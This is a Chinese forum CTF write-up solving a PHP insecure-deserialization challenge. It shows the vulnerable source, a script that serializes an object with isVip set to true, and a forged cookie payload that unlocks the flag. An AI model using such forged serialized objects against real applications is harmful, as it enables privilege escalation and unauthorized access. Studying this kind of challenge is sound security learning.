论坛首页 > CTF&WP专版

CTF-34解题思路

Track-子羽   ·   发表于 2021-11-22 17:33:11   ·   CTF&WP专版

源码分析

  1. <h3>挑战VIP会员的第二天<h3/>
  2. <?php
  3. error_reporting(0);
  4. highlight_file(__FILE__);
  5. include('flag.php');
  6. class ctfShowUser
  7. {
  8.     public $username='xxxxxx';
  9.     public $password='xxxxxx';
  10.     public $isVip=false;
  11.     public function checkVip()
  12.     {
  13.         return $this->isVip;
  14.     } 
  15.     public function login($u,$p)
  16.     {
  17.         return $this->username===$u&&$this->password===$p;
  18.     } 
  19.     public function vipOneKeyGetFlag(){
  20.         if($this->isVip)
  21.         {
  22.             global $flag;
  23.             echo "your flag is ".$flag;
  24.         }
  25.         else
  26.         {
  27.             echo "no vip, no flag";
  28.         }
  29.     }
  30. } 
  31. $username=$_GET['username'];
  32. $password=$_GET['password'];
  33. if(isset($username) && isset($password))
  34. {
  35.     $user = unserialize($_COOKIE['user']);
  36.     if($user->login($username,$password))
  37.     {
  38.         if($user->checkVip())
  39.         {
  40.             $user->vipOneKeyGetFlag();
  41.         }
  42.     }
  43.     else
  44.     {
  45.         echo "no vip,no flag"; 
  46.     } 
  47. }

反序列化的点在cookie的user中,我们需要让$isVip=true

生成序列化对象:

  1. <?php 
  2. class ctfShowUser
  3. {
  4.  public $isVip=true;
  5. }
  6. $a= serialize(new ctfShowUser());
  7. echo urlencode($a); 
  8. ?> 
  9. //运行结果 
  10. O:11:"ctfShowUser":1:{s:5:"isVip";b:1;} 
  11. O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

payload:

  1. ?username=xxxxxx&password=xxxxxx
  2. Cookie设置成:user=O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}

打赏我,让我更有动力~

0 条回复   |  直到 2021-11-22 | 774 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.